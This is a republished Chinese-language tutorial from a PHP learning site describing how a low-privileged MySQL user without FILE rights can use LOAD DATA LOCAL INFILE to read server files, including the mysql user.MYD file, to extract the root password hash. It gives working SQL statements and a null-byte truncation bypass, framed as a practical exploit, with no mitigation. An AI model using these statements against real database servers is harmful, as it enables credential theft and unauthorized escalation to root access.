Article Topic Learning Download Q&A Programming Dictionary Game Recent Updates

简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)

Home > Database > Mysql Tutorial > body text

Mysql漏洞利用（越权，实战如何从低权限拿到root密码）_MySQL

WBOY

Release： 2016-06-01 13:13:16

Original

1157 people have browsed it

众所周知，Mysql的用户在没有File权限情况下是无法通过Load_file读文件或者通过into dumpfile 或者into outfile去写文件，但是偶尔在一个网站上发现个小技巧，也就是通过load data infile可以读取本地文件到数据库，这样子我们就可以在低权限下通过这个bug去读取服务器上的文件。代码如下：

LOAD DATA LOCAL INFILE 'C:/boot.ini' INTO TABLE test FIELDS TERMINATED BY '';后来我就一直想怎么利用这个问题。一个可行的思路如下：

我们去读取mysql的数据库文件，mysql库的user表里存放着所有用户的hash，我们只要读取到这个文件，就差不多读取到了root的密码。

于是本地测试,注意，我当前连接的用户test是没有File权限的：

Mysql漏洞利用（越权，实战如何从低权限拿到root密码）1.jpg

下面我们执行如下语句：

LOAD DATA LOCAL INFILE 'C:/wamp/bin/mysql/mysql5.6.12/data/mysql/user.MYD' INTO TABLE test2 fields terminated by '';

然后select * from test2;

Mysql漏洞利用（越权，实战如何从低权限拿到root密码）2.jpg

发现啥都木有，只有一个烂字符，我们用winhex打开一下user.myd文件
Mysql漏洞利用（越权，实战如何从低权限拿到root密码）3.jpg

OK，找到问题了，被00字符给截断了，导致后面的东西都没进数据库。下面就想办法绕过这个限制。

经过几次尝试发现，在后面加上LINES TERMINATED BY ‘/0′ 即可，这样子就把截断符号作为分隔符处理了，完整的语句：

LOAD DATA LOCAL INFILE 'C:/wamp/bin/mysql/mysql5.6.12/data/mysql/user2.MYD' INTO TABLE test2 fields terminated by '' LINES TERMINATED BY '/0';

效果：
Mysql漏洞利用（越权，实战如何从低权限拿到root密码）4.jpg OK，完成！

Related labels：

how password Tips database website

source：php.cn

Previous article：mysql基础操作、sql技巧和sql的常见优化_MySQL Next article：MySQL数据备份与恢复_MySQL

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Latest Articles by Author

Unlocking Systems Development: A Beginner's Guide to C Programming

2024-10-10 10:43:41
The C Programming On-Ramp: A Smooth Start for Aspiring Developers

2024-10-10 10:23:51
Unlocking the World of C: Your First Steps in Systems Programming

2024-10-09 22:27:01
From Beginner to Builder: Mastering the Art of PHP Programming

2024-10-09 20:15:31
Master the Basics: C Programming for Absolute Beginners

2024-10-09 16:42:41
PHP Forms: Handling User Input Like a Pro

2024-10-09 16:12:01
C: The Language That Built Modern Computing (and You Can Learn It!)

2024-10-09 13:33:51
PHP for Absolute Beginners: No Coding Experience Required

2024-10-09 12:27:11
Your C Programming Cheerleaders: Support and Resources for Beginners

2024-10-09 12:00:03
Tame the Code Monster: A Fun and Friendly Approach to PHP

2024-10-09 11:03:31

Latest Issues

Record query under partial value conditions - SQL skill sharing I have a table called zipcode which has a column called code. The Code column contains the...

From 2024-04-06 16:01:26

0

1

395

How to remove the space below each line on the Tic-Tac-Toe board in Next.js using CSS? Why is there a space below each line? (CSS) I'm trying to make a Next.js tic-tac-toe app t...

From 2024-04-05 11:39:02

0

1

1431

What causes CSS text animations to jitter excessively on load? I tried every trick I could find, but the animation is still very choppy. I tried followin...

From 2024-04-01 23:54:24

0

1

322

Related Topics

More>

Popular Recommendations

Popular Tutorials

More>

Related Tutorials

Popular Recommendations

Latest courses

Latest Downloads

More>

Web Effects

Website Source Code

Website Materials

Front End Template

About us Disclaimer Sitemap: php.cn：Public welfare online PHP training，Help PHP learners grow quickly！